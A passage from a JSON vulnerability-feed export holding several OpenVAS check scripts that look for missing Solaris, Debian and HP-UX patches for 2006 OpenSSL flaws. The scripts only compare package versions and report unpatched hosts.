System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"wanboot on solaris_5.9_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n wanboot\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855008\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:28:12 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"117123-08\");\n script_cve_id(\"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\");\n script_name( \"Solaris Update for wanboot 117123-08\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-117123-08-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of wanboot\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"117123-08\", package:\"SUNWcar.us SUNWwbsup SUNWcar.u\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:51", "description": "The remote host is missing an update to openssl096\nannounced via advisory DSA 1195-1.\n\nMultiple vulnerabilities have been discovered in the OpenSSL\ncryptographic software package that could allow an attacker to launch\na denial of service attack by exhausting system resources or crashing\nprocesses on a victim's computer.\n\nCVE-2006-3738\nTavis Ormandy and Will Drewry of the Google Security Team\ndiscovered a buffer overflow in SSL_get_shared_ciphers utility\nfunction, used by some applications such as exim and mysql. An\nattacker could send a list of ciphers that would overrun a\nbuffer.\n\nCVE-2006-4343\nTavis Ormandy and Will Drewry of the Google Security Team\ndiscovered a possible DoS in the sslv2 client code. Where a\nclient application uses OpenSSL to make a SSLv2 connection to\na malicious server that server could cause the client to\ncrash.\n\nCVE-2006-2940\nDr S N Henson of the OpenSSL core team and Open Network\nSecurity recently developed an ASN1 test suite for NISCC\n(www.niscc.gov.uk). When the test suite was run against\nOpenSSL a DoS was discovered.\n\nCertain types of public key can take disproportionate amounts\nof time to process. This could be used by an attacker in a\ndenial of service attack.", "cvss3": {}, "published": "2008-01-17T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 1195-1 (openssl096)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-4343"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:57511", "href": "http://plugins.openvas.org/nasl.php?oid=57511", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1195_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1195-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) these problems have been fixed in\nversion 0.9.6m-1sarge4\n\nThis package exists only for compatibility with older software, and is\nnot present in the unstable or testing branches of Debian.\n\nWe recommend that you upgrade your openssl096 package. Note that\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201195-1\";\ntag_summary = \"The remote host is missing an update to openssl096\nannounced via advisory DSA 1195-1.\n\nMultiple vulnerabilities have been discovered in the OpenSSL\ncryptographic software package that could allow an attacker to launch\na denial of service attack by exhausting system resources or crashing\nprocesses on a victim's computer.\n\nCVE-2006-3738\nTavis Ormandy and Will Drewry of the Google Security Team\ndiscovered a buffer overflow in SSL_get_shared_ciphers utility\nfunction, used by some applications such as exim and mysql. An\nattacker could send a list of ciphers that would overrun a\nbuffer.\n\nCVE-2006-4343\nTavis Ormandy and Will Drewry of the Google Security Team\ndiscovered a possible DoS in the sslv2 client code. Where a\nclient application uses OpenSSL to make a SSLv2 connection to\na malicious server that server could cause the client to\ncrash.\n\nCVE-2006-2940\nDr S N Henson of the OpenSSL core team and Open Network\nSecurity recently developed an ASN1 test suite for NISCC\n(www.niscc.gov.uk). When the test suite was run against\nOpenSSL a DoS was discovered.\n\nCertain types of public key can take disproportionate amounts\nof time to process. This could be used by an attacker in a\ndenial of service attack.\";\n\n\nif(description)\n{\n script_id(57511);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:13:11 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2006-2940\", \"CVE-2006-3738\", \"CVE-2006-4343\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1195-1 (openssl096)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libssl0.9.6\", ver:\"0.9.6m-1sarge4\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:13:59", "description": "Check for the Version of Kernel", "cvss3": {}, "published": "2009-10-13T00:00:00", "type": "openvas", "title": "Solaris Update for Kernel 122300-44", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339", "CVE-2008-1483"], "modified": "2017-02-20T00:00:00", "id": "OPENVAS:855780", "href": "http://plugins.openvas.org/nasl.php?oid=855780", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for Kernel 122300-44\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"Kernel on solaris_5.9_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n Kernel\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855780);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 15:16:45 +0200 (Tue, 13 Oct 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"122300-44\");\n script_cve_id(\"CVE-2008-1483\", \"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\");\n script_name(\"Solaris Update for Kernel 122300-44\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-122300-44-1\");\n\n script_summary(\"Check for the Version of Kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"122300-44\", package:\"SUNWatfsu SUNWudfrx SUNWarc SUNWcarx.u SUNWrsg SUNWvolr SUNWcstl SUNWnfscx SUNWcslx SUNWsshdu SUNWcstlx SUNWrsgk SUNWpdx SUNWcsu SUNWnfssx SUNWnfscr SUNWcsxu SUNWnfssu SUNWaudit SUNWpd SUNWcsr SUNWsshdr SUNWefcx.us SUNWmdbx SUNWmdb SUNWdrrx.u SUNWvolu SUNWcar.u SUNWdrr.us SUNWudfr SUNWnfscu SUNWrsgx SUNWcar.m SUNWsshcu SUNWcar.us FJSVhea SUNWatfsr SUNWpiclu SUNWdrrx.us SUNWsshu SUNWcsl SUNWsshr SUNWdrr.u SUNWefcx.u SUNWnfssr SUNWcarx.us SUNWdrcrx.u SUNWhea\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:41:40", "description": "Check for the Version of Kernel", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for Kernel 122301-40", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339", "CVE-2008-1483"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310855018", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855018", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for Kernel 122301-40\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"Kernel on solaris_5.9_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n Kernel\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855018\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:31:50 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"122301-40\");\n script_cve_id(\"CVE-2008-1483\", \"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\");\n script_name( \"Solaris Update for Kernel 122301-40\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-122301-40-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of Kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"i386\", patch:\"122301-40\", package:\"SUNWsshcu SUNWcar.i SUNWarc SUNWmdb SUNWaudit SUNWsshdu SUNWcsl SUNWsshdr SUNWsshr SUNWcsr SUNWhea SUNWsshu SUNWcsu SUNWcstl\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:39:46", "description": "Check for the Version of Kernel", "cvss3": {}, "published": "2009-10-13T00:00:00", "type": "openvas", "title": "Solaris Update for Kernel 122300-44", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339", "CVE-2008-1483"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310855780", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855780", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for Kernel 122300-44\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"Kernel on solaris_5.9_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n Kernel\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855780\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 15:16:45 +0200 (Tue, 13 Oct 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"122300-44\");\n script_cve_id(\"CVE-2008-1483\", \"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\");\n script_name(\"Solaris Update for Kernel 122300-44\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-122300-44-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of Kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"122300-44\", package:\"SUNWatfsu SUNWudfrx SUNWarc SUNWcarx.u SUNWrsg SUNWvolr SUNWcstl SUNWnfscx SUNWcslx SUNWsshdu SUNWcstlx SUNWrsgk SUNWpdx SUNWcsu SUNWnfssx SUNWnfscr SUNWcsxu SUNWnfssu SUNWaudit SUNWpd SUNWcsr SUNWsshdr SUNWefcx.us SUNWmdbx SUNWmdb SUNWdrrx.u SUNWvolu SUNWcar.u SUNWdrr.us SUNWudfr SUNWnfscu SUNWrsgx SUNWcar.m SUNWsshcu SUNWcar.us FJSVhea SUNWatfsr SUNWpiclu SUNWdrrx.us SUNWsshu SUNWcsl SUNWsshr SUNWdrr.u SUNWefcx.u SUNWnfssr SUNWcarx.us SUNWdrcrx.u SUNWhea\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:38:32", "description": "Check for the Version of Kernel", "cvss3": {}, "published": "2009-10-13T00:00:00", "type": "openvas", "title": "Solaris Update for Kernel 122301-44", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339", "CVE-2008-1483"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310855768", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855768", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for Kernel 122301-44\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"Kernel on solaris_5.9_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n Kernel\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855768\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 15:16:45 +0200 (Tue, 13 Oct 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"122301-44\");\n script_cve_id(\"CVE-2008-1483\", \"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\");\n script_name(\"Solaris Update for Kernel 122301-44\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-122301-44-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of Kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"i386\", patch:\"122301-44\", package:\"SUNWatfsu SUNWarc SUNWrsg SUNWcstl SUNWsshdu SUNWcar.i SUNWrsgk SUNWcsu SUNWnfscr SUNWnfssu SUNWaudit SUNWcsr SUNWsshdr SUNWmdb SUNWvolu SUNWudfr SUNWnfscu SUNWsshcu SUNWatfsr SUNWsshu SUNWcsl SUNWsshr SUNWnfssr SUNWhea\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:41:55", "description": "Check for the Version of Apache Remote Execution of Arbitrary Code", "cvss3": {}, "published": "2009-05-05T00:00:00", "type": "openvas", "title": "HP-UX Update for Apache Remote Execution of Arbitrary Code HPSBUX02186", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2005-2969", "CVE-2006-4339"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310835119", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310835119", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for Apache Remote Execution of Arbitrary Code HPSBUX02186\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote execution of arbitrary code\n Denial of Service (DoS)\n and unauthorized access.\";\ntag_affected = \"Apache Remote Execution of Arbitrary Code on\n HP-UX B.11.11, B.11.23, and B.11.31\";\ntag_insight = \"Potential security vulnerabilities have been identified with Apache running \n on HP-UX. These vulnerabilities could be exploited remotely to allow \n execution of arbitrary code, Denial of Service (DoS), or unauthorized \n access.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c00849540-2\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.835119\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"HPSBUX\", value: \"02186\");\n script_cve_id(\"CVE-2006-2940\", \"CVE-2006-2937\", \"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2005-2969\");\n script_name( \"HP-UX Update for Apache Remote Execution of Arbitrary Code HPSBUX02186\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of Apache Remote Execution of Arbitrary Code\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.00\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"A.2.0.58.01\", rls:\"HPUX11.00\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"B.2.0.58.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"A.2.0.58.01\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"B.2.0.58.01\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:39:24", "description": "Check for the Version of Kernel", "cvss3": {}, "published": "2009-09-23T00:00:00", "type": "openvas", "title": "Solaris Update for Kernel 122301-42", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339", "CVE-2008-1483"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310855702", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855702", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for Kernel 122301-42\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# 